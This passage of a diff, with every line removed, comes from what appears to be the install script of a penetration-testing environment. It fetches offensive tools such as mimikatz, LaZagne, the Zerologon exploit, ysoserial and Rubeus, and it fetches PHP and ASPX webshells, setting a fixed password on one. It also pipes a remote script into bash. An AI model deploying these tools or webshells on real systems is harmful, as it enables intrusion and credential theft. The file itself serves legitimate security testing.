/opt/tools/git-dumper - python3 
-m pip install -r requirements.txt -} - -function install_gittools() { - colorecho "Installing GitTools" - git -C /opt/tools/ clone https://github.com/internetwache/GitTools.git -} - -function gopherus() { - colorecho "Installing gopherus" - git -C /opt/tools/ clone https://github.com/tarunkant/Gopherus - cd /opt/tools/Gopherus - ./install.sh -} - -function install_ysoserial() { - colorecho "Installing ysoserial" - mkdir /opt/tools/ysoserial/ - wget -O /opt/tools/ysoserial/ysoserial.jar "https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar" -} - -function ysoserial_net() { - colorecho "Downloading ysoserial" - url=$(curl -s https://github.com/pwntester/ysoserial.net/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/') - tag=${url##*/} - prefix=${tag:1} - wget -O /tmp/ysoserial_net.zip "$url/ysoserial-$prefix.zip" - unzip -d /opt/resources/windows/ /tmp/ysoserial_net.zip - mv /opt/resources/windows/Release/ /opt/resources/windows/ysoserial.net - rm /tmp/ysoserial_net.zip -} - -function phpggc(){ - colorecho "Installing phpggc" - git -C /opt/tools clone https://github.com/ambionics/phpggc.git -} - -function symfony_exploits(){ - colorecho "Installing symfony-exploits" - git -C /opt/tools clone https://github.com/ambionics/symfony-exploits -} - -function install_john() { - colorecho "Installing john the ripper" - fapt qtbase5-dev - git -C /opt/tools/ clone https://github.com/openwall/john - cd /opt/tools/john/src && ./configure && make -} - -function install_nth() { - colorecho "Installing Name-That-Hash" - python3 -m pip install name-that-hash -} - -function memcached-cli() { - colorecho "Installing memcached-cli" - npm install -g memcached-cli -} - -function zerologon() { - colorecho "Pulling CVE-2020-1472 exploit and scan scripts" - git -C /opt/tools/ clone https://github.com/SecuraBV/CVE-2020-1472 - mv /opt/tools/CVE-2020-1472 /opt/tools/zerologon-scan - git -C /opt/tools/ clone 
https://github.com/dirkjanm/CVE-2020-1472 - mv /opt/tools/CVE-2020-1472 /opt/tools/zerologon-exploit -} - -function install_proxmark3() { - colorecho "Installing proxmark3 client" - colorecho "Compiling proxmark client for generic usage with PLATFORM=PM3OTHER (read https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md#platform)" - colorecho "It can be compiled again for RDV4.0 with 'make clean && make all && make install' from /opt/tools/proxmak3/" - apt-get -y install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev libbluetooth-dev - git -C /opt/tools/ clone https://github.com/RfidResearchGroup/proxmark3.git - cd /opt/tools/proxmark3 - make clean - make all PLATFORM=PM3OTHER - make install PLATFORM=PM3OTHER -} - -function checksec_py() { - colorecho "Installing checksec.py" - python3 -m pip install checksec.py -} - -function sysinternals() { - colorecho "Downloading SysinternalsSuite" - wget -O /opt/resources/windows/sysinternals.zip "https://download.sysinternals.com/files/SysinternalsSuite.zip" - unzip -d /opt/resources/windows/sysinternals /opt/resources/windows/sysinternals.zip - rm /opt/resources/windows/sysinternals.zip -} - -function winenum() { - colorecho "Downloading WinEnum" - git -C /opt/resources/windows/ clone https://github.com/mattiareggiani/WinEnum -} - -function pspy() { - colorecho "Downloading pspy" - mkdir -p /opt/resources/linux/pspy - wget -O /opt/resources/linux/pspy/pspy32 "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy32" - wget -O /opt/resources/linux/pspy/pspy64 "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy64" - wget -O /opt/resources/linux/pspy/pspy32s "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | 
grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy32s" - wget -O /opt/resources/linux/pspy/pspy64s "$(curl -s https://github.com/DominicBreuker/pspy/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/pspy64s" -} - -function peass() { - colorecho "Downloading PEAS Suite" - git -C /opt/resources/ clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite - cp -v /opt/resources/windows/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe /opt/resources/windows/winPEAS/winPEAS_x64.exe - cp -v /opt/resources/windows/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe /opt/resources/windows/winPEAS/winPEAS_x86.exe - mv /opt/resources/privilege-escalation-awesome-scripts-suite/linPEAS /opt/resources/linux - mv /opt/resources/privilege-escalation-awesome-scripts-suite/winPEAS /opt/resources/windows - rm -r /opt/resources/privilege-escalation-awesome-scripts-suite -} - -function linux_smart_enumeration() { - colorecho "Downloading Linux Smart Enumeration" - wget -O /opt/resources/linux/lse.sh "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -} - -function linenum() { - colorecho "Downloading LinEnum" - wget -O /opt/resources/linux/LinEnum.sh "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh" -} - -function linux_exploit_suggester() { - colorecho "Downloading Linux Exploit Suggester" - wget -O /opt/resources/linux/les.sh "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh" -} - -function mimikatz() { - colorecho "Downloading mimikatz" - wget -O /opt/resources/windows/mimikatz.zip "$(curl -s https://github.com/gentilkiwi/mimikatz/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/mimikatz_trunk.zip" - unzip -d /opt/resources/windows/mimikatz /opt/resources/windows/mimikatz.zip -} - -function mailsniper() { - colorecho "Downloading MailSniper" - git -C /opt/resources/windows/ clone 
https://github.com/dafthack/MailSniper -} - -function nishang() { - colorecho "Downloading Nishang" - git -C /opt/resources/windows/ clone https://github.com/samratashok/nishang.git -} - -function powersploit() { - colorecho "Downloading PowerSploit" - git -C /opt/resources/windows/ clone https://github.com/PowerShellMafia/PowerSploit -} - -function privesccheck() { - colorecho "Downloading PrivescCheck" - git -C /opt/resources/windows/ clone https://github.com/itm4n/PrivescCheck -} - -function sharpcollection() { - colorecho "Downloading SharpCollection" - git -C /opt/resources/windows/ clone https://github.com/Flangvik/SharpCollection -} - -function rubeus() { - colorecho "Downloading Rubeus" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/Rubeus_3.exe" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/Rubeus_4.5.exe" -} - -function inveigh() { - colorecho "Downloading Inveigh" - git -C /opt/resources/windows/ clone https://github.com/Kevin-Robertson/Inveigh -} - -function sharphound() { - colorecho "Downloading SharpHound" - wget -P /opt/resources/windows/ "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.exe" - wget -P /opt/resources/windows/ "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1" -} - -function azurehound() { - colorecho "Downloading AzureHound" - wget -P /opt/resources/windows/ "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/AzureHound.ps1" -} - -function juicypotato() { - colorecho "Downloading JuicyPotato" - wget -P /opt/resources/windows/ "$(curl -s https://github.com/ohpe/juicy-potato/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/JuicyPotato.exe" -} - -function impacket_windows() { - colorecho "Downloading Impacket examples for Windows" - git -C /opt/resources/windows/ clone 
https://github.com/maaaaz/impacket-examples-windows -} - -function webshells() { - colorecho "Downloading webshells" - git -C /opt/resources/webshells/PHP/ clone https://github.com/mIcHyAmRaNe/wso-webshell - # Setting password to exegol4thewin - sed -i 's/fa769dac7a0a94ee47d8ebe021eaba9e/0fc3bcf177377d328c77b2b51b7f3c9b/g' /opt/resources/webshells/PHP/wso-webshell/wso.php - echo 'exegol4thewin' > /opt/resources/webshells/PHP/wso-webshell/password.txt - git -C /opt/resources/webshells/PHP/ clone https://github.com/flozz/p0wny-shell - wget -O /opt/resources/webshells/ASPX/webshell.aspx "https://raw.githubusercontent.com/xl7dev/WebShell/master/Aspx/ASPX%20Shell.aspx" -} - -function nc() { - colorecho "Downloading nc for Windows" - cp -v /usr/bin/nc.traditional /opt/resources/linux/nc - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/nc.exe" -} - -function http-put-server() { - colorecho "Downloading http-put-server for Python3" - wget -O /opt/resources/linux/http-put-server.py https://gist.githubusercontent.com/mildred/67d22d7289ae8f16cae7/raw/214c213c9415da18a471d1ed04660022cce059ef/server.py -} - -function spoolsample() { - colorecho "Downloading SpoolSample" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/SpoolSample.exe" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/SpoolSample_v4.5_x64..exe" -} - -function diaghub() { - colorecho "Downloading DiagHub" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/diaghub.exe" -} - -function lazagne() { - colorecho "Downloading LaZagne" - git -C /tmp/ clone https://github.com/AlessandroZ/LaZagne - mv /tmp/LaZagne/Linux /opt/resources/linux/LaZagne - mv /tmp/LaZagne/Mac /opt/resources/mac/LaZagne - mv /tmp/LaZagne/Windows /opt/resources/widnows/LaZagne - wget -P /opt/resources/windows/LaZagne/ "$(curl -s 
https://github.com/AlessandroZ/LaZagne/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/lazagne.exe" - rm -r /tmp/LaZagne - # Add LaZagne Forensic? https://github.com/AlessandroZ/LaZagneForensic -} - -function sublinacl() { - colorecho "Downloading Sublinacl" - wget -P /opt/resources/windows/ "https://gitlab.com/onemask/pentest-tools/-/raw/master/windows/sublinacl.exe" -} - -function powersploit() { - colorecho "Downloading PowerSploit" - git -C /opt/resources/windows/ clone https://github.com/PowerShellMafia/PowerSploit -} - -function mimipenguin() { - colorecho "Downloading mimipenguin" - git -C /opt/resources/linux/ clone https://github.com/huntergregal/mimipenguin -} - -function mimipy() { - colorecho "Downloading mimipy" - git -C /opt/resources/linux/ clone https://github.com/n1nj4sec/mimipy -} - -function plink() { - colorecho "Downloading plink" - wget -O /opt/resources/windows/plink32.exe "https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe" - wget -O /opt/resources/windows/plink64.exe "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -} - -function deepce() { - colorecho "Downloading deepce" - wget -O /opt/resources/linux/deepce "https://github.com/stealthcopter/deepce/raw/master/deepce.sh" -} - -function arsenal() { - echo "Installing Arsenal" - git -C /opt/tools/ clone https://github.com/Orange-Cyberdefense/arsenal - cd /opt/tools/arsenal - python3 -m pip install -r requirements.txt -} - -function bloodhound() { - echo "Installing BloodHound from sources" - git -C /opt/tools/ clone https://github.com/BloodHoundAD/BloodHound/ - mv /opt/tools/BloodHound /opt/tools/BloodHound4 - zsh -c "source ~/.zshrc && cd /opt/tools/BloodHound4 && nvm install 16.13.0 && nvm use 16.13.0 && npm install -g electron-packager && npm install && npm run build:linux" - mkdir -p ~/.config/bloodhound - cp -v /root/sources/bloodhound/config.json ~/.config/bloodhound/config.json - cp -v /root/sources/bloodhound/customqueries.json 
~/.config/bloodhound/customqueries.json -} - -function bloodhound_old_v3() { - echo "Installing Bloodhound v3 (just-in-case)" - fapt libxss1 - wget -P /tmp/ "https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.5/BloodHound-linux-x64.zip" - unzip /tmp/BloodHound-linux-x64.zip -d /opt/tools/ - mv /opt/tools/BloodHound-linux-x64 /opt/tools/BloodHound3 - rm /tmp/BloodHound-linux-x64.zip -} - -function bloodhound_old_v2() { - echo "Installing BloodHound v2 (for older databases/collections)" - wget -P /tmp/ https://github.com/BloodHoundAD/BloodHound/releases/download/2.2.1/BloodHound-linux-x64.zip - unzip /tmp/BloodHound-linux-x64.zip -d /opt/tools/ - mv /opt/tools/BloodHound-linux-x64 /opt/tools/BloodHound2 - rm /tmp/BloodHound-linux-x64.zip -} - -function bettercap_install() { - colorecho "Installing Bettercap" - apt-get -y install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev - go install -v github.com/bettercap/bettercap@latest - /root/go/bin/bettercap -eval "caplets.update; ui.update; q" - sed -i 's/set api.rest.username user/set api.rest.username bettercap/g' /usr/local/share/bettercap/caplets/http-ui.cap - sed -i 's/set api.rest.password pass/set api.rest.password exegol4thewin/g' /usr/local/share/bettercap/caplets/http-ui.cap - sed -i 's/set api.rest.username user/set api.rest.username bettercap/g' /usr/local/share/bettercap/caplets/https-ui.cap - sed -i 's/set api.rest.password pass/set api.rest.password exegol4thewin/g' /usr/local/share/bettercap/caplets/https-ui.cap -} - -function hcxtools() { - colorecho "Installing hcxtools" - git -C /opt/tools/ clone https://github.com/ZerBea/hcxtools - cd /opt/tools/hcxtools/ - make - make install -} - -function hcxdumptool() { - colorecho "Installing hcxdumptool" - apt-get -y install libcurl4-openssl-dev libssl-dev - git -C /opt/tools/ clone https://github.com/ZerBea/hcxdumptool - cd /opt/tools/hcxdumptool - make - make install - ln -s /usr/local/bin/hcxpcapngtool /usr/local/bin/hcxpcaptool -} - 
-function pyrit() { - colorecho "Installing pyrit" - git -C /opt/tools clone https://github.com/JPaulMora/Pyrit - cd /opt/tools/Pyrit - python -m pip install psycopg2-binary scapy - #https://github.com/JPaulMora/Pyrit/issues/591 - cp -v /root/sources/patches/undefined-symbol-aesni-key.patch undefined-symbol-aesni-key.patch - git apply --verbose undefined-symbol-aesni-key.patch - python setup.py clean - python setup.py build - python setup.py install -} - -function wifite2() { - colorecho "Installing wifite2" - git -C /opt/tools/ clone https://github.com/derv82/wifite2.git - cd /opt/tools/wifite2/ - python3 setup.py install -} - -function wireshark_sources() { - colorecho "Installing tshark, wireshark" - apt-get -y install cmake libgcrypt20-dev libglib2.0-dev libpcap-dev qtbase5-dev libssh-dev libsystemd-dev qtmultimedia5-dev libqt5svg5-dev qttools5-dev libc-ares-dev flex bison byacc - wget -O /tmp/wireshark.tar.xz https://www.wireshark.org/download/src/wireshark-latest.tar.xz - cd /tmp/ - tar -xvf /tmp/wireshark.tar.xz - cd "$(find . -maxdepth 1 -type d -name 'wireshark*')" - cmake . - make - make install - cd /tmp/ - rm -r "$(find . 
-maxdepth 1 -type d -name 'wireshark*')" - wireshark.tar.xz -} - -function infoga() { - colorecho "Installing infoga" - git -C /opt/tools/ clone https://github.com/m4ll0k/Infoga.git - find /opt/tools/Infoga/ -type f -print0 | xargs -0 dos2unix - cd /opt/tools/Infoga - python setup.py install -} - -function buster() { - colorecho "Installing buster" - git -C /opt/tools/ clone https://github.com/sham00n/buster.git - cd /opt/tools/buster - python3 setup.py install -} - -function pwnedornot() { - colorecho "Installing pwnedornot" - git -C /opt/tools/ clone https://github.com/thewhiteh4t/pwnedOrNot -} -function ghunt() { - colorecho "Installing ghunt" - apt-get update - apt-get install -y curl unzip gnupg - curl -sS -o - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - - echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list - apt-get update - apt-get install -y google-chrome-stable - rm -rf /var/lib/apt/lists/* - git -C /opt/tools/ clone https://github.com/mxrch/GHunt - cd /opt/tools/GHunt - python3 -m pip install -r requirements.txt - python3 download_chromedriver.py -} - - -function oaburl_py() { - colorecho "Downloading oaburl.py" - mkdir /opt/tools/OABUrl - wget -O /opt/tools/OABUrl/oaburl.py "https://gist.githubusercontent.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438/raw/96ec2f68a905eed4d519d9734e62edba96fd15ff/oaburl.py" - chmod +x /opt/tools/OABUrl/oaburl.py -} - -function libmspack() { - colorecho "Installing libmspack" - git -C /opt/tools/ clone https://github.com/kyz/libmspack.git - cd /opt/tools/libmspack/libmspack - ./rebuild.sh - ./configure - make -} - -function peas_offensive() { - colorecho "Installing PEAS-Offensive" - git -C /opt/tools/ clone https://github.com/snovvcrash/peas.git peas-offensive - python3 -m pip install pipenv - cd /opt/tools/peas-offensive - pipenv --python 2.7 install -r requirements.txt -} - -function ruler() { - colorecho "Downloading ruler 
and form templates" - mkdir -p /opt/tools/ruler/templates - wget -O /opt/tools/ruler/ruler "$(curl -s https://github.com/sensepost/ruler/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/ruler-linux64" - chmod +x /opt/tools/ruler/ruler - wget -O /opt/tools/ruler/templates/formdeletetemplate.bin "https://github.com/sensepost/ruler/raw/master/templates/formdeletetemplate.bin" - wget -O /opt/tools/ruler/templates/formtemplate.bin "https://github.com/sensepost/ruler/raw/master/templates/formtemplate.bin" - wget -O /opt/tools/ruler/templates/img0.bin "https://github.com/sensepost/ruler/raw/master/templates/img0.bin" - wget -O /opt/tools/ruler/templates/img1.bin "https://github.com/sensepost/ruler/raw/master/templates/img1.bin" -} - -function ghidra() { - colorecho "Installing Ghidra" - apt-get -y install openjdk-14-jdk - wget -P /tmp/ "https://ghidra-sre.org/ghidra_9.2.3_PUBLIC_20210325.zip" - unzip /tmp/ghidra_9.2.3_PUBLIC_20210325.zip -d /opt/tools - rm /tmp/ghidra_9.2.3_PUBLIC_20210325.zip -} - -function burp() { - colorecho "Installing Burp" - burp_version=$(curl -s "https://portswigger.net/burp/releases#community" | grep -P -o "\d{4}-\d-\d" | head -1 | tr - .) - wget "https://portswigger.net/burp/releases/download?product=community&version=$burp_version&type=Linux" -O /tmp/burp.sh - chmod +x "/tmp/burp.sh" - /tmp/burp.sh -q - # FIXME: find a way to install in /opt/tools? - # FIXME: set up the dark theme right away? - # FIXME: add burp certificate to embedded firefox and chrome? 
-} - -function bitleaker() { - colorecho "Downloading bitleaker for BitLocker TPM attacks" - git -C "/opt/resources/encrypted disks/" clone https://github.com/kkamagui/bitleaker -} - -function napper() { - colorecho "Download napper for TPM vuln scanning" - git -C "/opt/resources/encrypted disks/" clone https://github.com/kkamagui/napper-for-tpm -} - -function linkedin2username() { - colorecho "Installing linkedin2username" - git -C /opt/tools/ clone https://github.com/initstring/linkedin2username - cd /opt/tools/linkedin2username - python3 -m python -m pip install -r requirements.txt -} - -function toutatis() { - colorecho "Installing toutatis" - git -C /opt/tools/ clone https://github.com/megadose/toutatis - cd /opt/tools/toutatis - python3 setup.py install -} - -function carbon14() { - colorecho "Installing Carbon14" - git -C /opt/tools/ clone https://github.com/Lazza/Carbon14 - cd /opt/tools/Carbon14 - python3 -m pip install -r requirements.txt -} - -function youtubedl() { - colorecho "Installing youtube-dl" - python3 -m pip install youtube-dl -} - -function ipinfo() { - colorecho "Installing ipinfo" - sudo npm install ipinfo-cli --global -} - -function constellation() { - colorecho "Installing constellation" - cd /opt/tools/ - wget https://github.com/constellation-app/constellation/releases/download/v2.1.1/constellation-linux-v2.1.1.tar.gz - tar xvf constellation-linux-v2.1.1.tar.gz - rm constellation-linux-v2.1.1.tar.gz -} - - -function holehe() { - colorecho "Installing holehe" - python3 -m pip install holehe -} - -function twint() { - colorecho "Installing twint" - python3 -m pip install twint -} - -function tiktokscraper() { - colorecho "Installing tiktok-scraper" - npm i -g tiktok-scraper -} - -function h8mail() { - colorecho "Installing h8mail" - python3 -m pip install h8mail -} - - -function phoneinfoga() { - colorecho "Installing phoneinfoga" - curl -sSL https://raw.githubusercontent.com/sundowndev/PhoneInfoga/master/support/scripts/install | bash - 
sudo mv ./phoneinfoga /opt/tools/bin -} - -function windapsearch-go() { - colorecho "Installing Go windapsearch" - wget -O /opt/tools/bin/windapsearch "$(curl -s https://github.com/ropnop/go-windapsearch/releases/latest/ | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/')/windapsearch-linux-amd64" - chmod +x /opt/tools/bin/windapsearch -} - -function icmpdoor() { - colorecho "Installing icmptools" - git -C /opt/tools/ clone https://github.com/krabelize/icmpdoor - mkdir -p /opt/resources/windows/icmptools/ - cp -v /opt/tools/icmpdoor/binaries/x86_64-linux/* /opt/resources/windows/icmptools/ - mkdir -p /opt/resources/linux/icmptools/ - cp -v /opt/tools/icmpdoor/binaries/x86_64-linux/* /opt/resources/linux/icmptools/ -} - -function install_trilium() { - colorecho "Installing Trilium (building from sources)" - apt-get -y install libpng16-16 libpng-dev pkg-config autoconf libtool build-essential nasm libx11-dev libxkbfile-dev - git -C /opt/tools/ clone -b stable https://github.com/zadam/trilium.git - cd /opt/tools/trilium - # the npm install needs to be executed in the zsh context where nvm is used to set the Node version to be used. 
- zsh -c "source ~/.zshrc && cd /opt/tools/trilium && nvm use node && npm install && npm rebuild" - mkdir -p /root/.local/share/trilium-data - cp -v /root/sources/trilium/* /root/.local/share/trilium-data -} - -function ntlmv1-multi() { - colorecho "Installing ntlmv1 multi tool" - git -C /opt/tools clone https://github.com/evilmog/ntlmv1-multi -} - -function install_droopescan() { - colorecho "Installing droopescan" - git -C /opt/tools clone https://github.com/droope/droopescan.git - cd /opt/tools/droopescan - python3 -m pip install -r requirements.txt - python3 setup.py install -} - -function install_drupwn() { - colorecho "Installing drupwn" - git -C /opt/tools clone https://github.com/immunIT/drupwn.git - cd /opt/tools/drupwn - python3 setup.py install -} - -function kubectl(){ - colorecho "Installing kubectl" - mkdir -p /opt/tools/kubectl - cd /opt/tools/kubectl - curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" - install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl -} - -function awscli(){ - colorecho "Installing aws cli" - cd /tmp - curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" - unzip awscliv2.zip - ./aws/install -i /opt/tools/aws-cli -b /usr/local/bin - rm -rf aws - rm awscliv2.zip -} - -function install_scout() { - colorecho "Installing ScoutSuite" - python3 -m pip install scoutsuite -} - -function jdwp_shellifier(){ - colorecho "Installing jdwp_shellifier" - git -C /opt/tools/ clone https://github.com/IOActive/jdwp-shellifier.git -} - -function maigret_pip() { - colorecho "Installing maigret" - pip3 install maigret -} - -function amber() { - colorecho "Installing amber" - # TODO: this fails and needs a fix - go install -v github.com/EgeBalci/amber@latest -} - -function hashonymize() { - colorecho "Installing hashonymizer" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/hashonymize - cd /opt/tools/hashonymize - python3 setup.py install -} 
- -function install_theHarvester() { - colorecho "Installing theHarvester" - python3 -m pip install censys - apt-get -y install theharvester -} - -function install_pcsc() { - colorecho "Installing tools for PC/SC (smartcard)" - apt-get install -y pcsc-tools pcscd libpcsclite-dev libpcsclite1 -} - -function install_libnfc() { - colorecho "Installing libnfc" - apt-get install -y libnfc-dev libnfc-bin - cd /opt/tools/ - wget http://dl.bintray.com/nfc-tools/sources/libnfc-1.7.1.tar.bz2 - tar xjf libnfc-1.7.1.tar.bz2 - cd libnfc-1.7.1 - ./configure --with-drivers=all - make - make install - ldconfig - cd ../ - rm libnfc-1.7.1.tar.bz2 -} - -function install_mfoc() { - colorecho "Installing mfoc" - git -C /opt/tools/ clone https://github.com/nfc-tools/mfoc - cd /opt/tools/mfoc - autoreconf -vis - ./configure - make - make install -} - -function install_mfcuk() { - colorecho "Installing mfcuk" - apt-get install -y mfcuk -} - -function install_libnfc-crypto1-crack() { - colorecho "Installing libnfc_crypto1_crack" - git -C /opt/tools/ clone https://github.com/aczid/crypto1_bs - cd /opt/tools/crypto1_bs - wget https://github.com/droidnewbie2/acr122uNFC/raw/master/crapto1-v3.3.tar.xz - wget https://github.com/droidnewbie2/acr122uNFC/raw/master/craptev1-v1.1.tar.xz - xz -d craptev1-v1.1.tar.xz crapto1-v3.3.tar.xz - tar xvf craptev1-v1.1.tar - tar xvf crapto1-v3.3.tar --one-top-level - make CFLAGS=-"-std=gnu99 -O3 -march=native -Wl,--allow-multiple-definition" - cp libnfc_crypto1_crack /opt/tools/bin -} - -function install_mfdread() { - colorecho "Installing mfdread" - pip3 install bitstring - git -C /opt/tools/ clone https://github.com/zhovner/mfdread -} - -function install_mousejack() { - colorecho "Installing mousejack" - apt-get -y install sdcc binutils python git - python-pip - git -C /opt/tools/ clone https://github.com/BastilleResearch/mousejack - cd /opt/tools/mousejack - git submodule init - git submodule update - cd nrf-research-firmware - make -} - -function 
install_jackit() { - colorecho "Installing jackit" - git -C /opt/tools/ clone https://github.com/insecurityofthings/jackit - cd /opt/tools/jackit - pip install -e . -} - -function install_gosecretsdump() { - colorecho "Installing gosecretsdump" - git -C /opt/tools/ clone https://github.com/c-sto/gosecretsdump - go install -v github.com/C-Sto/gosecretsdump@latest -} - -function install_hackrf() { - colorecho "Installing HackRF tools" - apt-get -y install hackrf -} - -function install_gqrx() { - colorecho "Installing gqrx" - apt-get -y install gqrx-sdr -} - -function install_sipvicious() { - colorecho "Installing SIPVicious" - git -C /opt/tools/ clone https://github.com/enablesecurity/sipvicious.git - cd /opt/tools/sipvicious/ - python3 setup.py install -} - -function install_httpmethods() { - colorecho "Installing httpmethods" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/httpmethods - cd /opt/tools/httpmethods - python3 setup.py install -} - -function install_adidnsdump() { - colorecho "Installing adidnsdump" - git -C /opt/tools/ clone https://github.com/dirkjanm/adidnsdump - cd /opt/tools/adidnsdump/ - python3 -m pip install . 
-} - -function install_powermad() { - colorecho "Downloading Powermad for resources" - git -C /opt/resources/windows/ clone https://github.com/Kevin-Robertson/Powermad -} - -function install_snaffler() { - colorecho "Downloading Snaffler for resources" - url=$(curl -s https://github.com/SnaffCon/Snaffler/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/') - mkdir -p /opt/resources/windows/Snaffler - wget -O /opt/resources/windows/Snaffler.zip $url/Snaffler.zip - unzip -d /opt/resources/windows/Snaffler /opt/resources/windows/Snaffler.zip - rm -v /opt/resources/windows/Snaffler.zip -} - -function install_dnschef() { - colorecho "Installing DNSChef" - git -C /opt/tools/ clone https://github.com/iphelix/dnschef -} - -function install_h2csmuggler() { - colorecho "Installing h2csmuggler" - git -C /opt/tools/ clone https://github.com/BishopFox/h2csmuggler - python3 -m pip install h2 -} - -function install_byp4xx() { - colorecho "Installing byp4xx" - git -C /opt/tools/ clone https://github.com/lobuhi/byp4xx -} - -function install_pipx() { - colorecho "Installing pipx" - python3 -m pip install pipx - pipx ensurepath -} - -function install_peepdf() { - colorecho "Installing peepdf" - fapt libjpeg-dev - python3 -m pip install peepdf -} - -function install_volatility() { - colorecho "Installing volatility" - apt-get -y install pcregrep libpcre++-dev python2-dev yara - git -C /opt/tools/ clone https://github.com/volatilityfoundation/volatility - cd /opt/tools/volatility - python -m pip install pycrypto distorm3 pillow openpyxl ujson - python setup.py install - # https://github.com/volatilityfoundation/volatility/issues/535#issuecomment-407571161 - ln -s /usr/local/lib/python2.7/dist-packages/usr/lib/libyara.so /usr/lib/libyara.so -} - -function install_zsteg() { - colorecho "Installing zsteg" - gem install zsteg -} - -function install_stegolsb() { - colorecho "Installing stegolsb" - python3 -m pip install stego-lsb -} - -function install_whatportis() { - 
colorecho "Installing whatportis" - python3 -m pip install whatportis - echo y | whatportis --update -} - -function install_ultimate_vimrc() { - colorecho "Installing The Ultimate vimrc" - git clone --depth=1 https://github.com/amix/vimrc.git ~/.vim_runtime - sh ~/.vim_runtime/install_awesome_vimrc.sh -} - -function install_ngrok() { - colorecho "Installing ngrok" - wget -O /tmp/ngrok.zip https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip - unzip -d /opt/tools/bin/ /tmp/ngrok.zip -} - -function install_chisel() { - colorecho "Installing chisel" - go get -v github.com/jpillora/chisel - #FIXME: add windows pre-compiled binaries in /opt/ressources/windows? -} - -function install_sshuttle() { - colorecho "Installing sshtuttle" - git -C /opt/tools/ clone https://github.com/sshuttle/sshuttle.git - cd /opt/tools/sshuttle - python3 setup.py install -} - -function install_pygpoabuse() { - colorecho "Installing pyGPOabuse" - git -C /opt/tools/ clone https://github.com/Hackndo/pyGPOAbuse -} - -function install_rsactftool() { - colorecho "Installing RsaCtfTool" - git -C /opt/tools/ clone https://github.com/Ganapati/RsaCtfTool - cd /opt/tools/RsaCtfTool - apt-get -y install libgmp3-dev libmpc-dev - python3 -m pip install -r requirements.txt -} - -function install_feroxbuster() { - colorecho "Installing feroxbuster" - # cd /tmp - # curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/feroxbuster_amd64.deb.zip - # unzip feroxbuster_amd64.deb.zip - # rm feroxbuster_amd64.deb.zip - # apt-get -y install -f ./feroxbuster_*_.deb - # rm feroxbuster*.deb - apt-get -y install feroxbuster -} - -function install_bloodhound-import() { - colorecho "Installing bloodhound-import" - python3 -m pip install bloodhound-import -} - -function install_bloodhound-quickwin() { - colorecho "Installing bloodhound-quickwin" - python3 -m pip install py2neo pandas prettytable - git -C /opt/tools/ clone https://github.com/kaluche/bloodhound-quickwin -} - -function 
